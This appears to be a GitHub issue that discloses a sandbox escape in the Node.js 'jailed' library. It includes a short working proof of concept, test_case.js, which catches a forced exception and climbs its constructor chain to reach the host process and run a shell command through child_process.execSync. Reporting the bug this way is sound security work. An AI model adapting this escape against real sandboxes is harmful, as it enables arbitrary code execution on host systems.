Sandbox Escape Bug in jailed with Node.js
seongil-wi opened this issue · comments
Seongil Wi commented
-
Jailed version: 0.3.1
-
Node version: 18.15.0
-
run-jailed.js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
test_case.js
try{
this.__defineGetter__("x", eval);
eval.toString = toLocaleString
eval < x
} catch(pp){
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
application.disconnect();
Sandbox can be escaped by three lines of code (Notice that each line of code is essential to triggering the bug.)
We can execute arbitrary shell code using process module.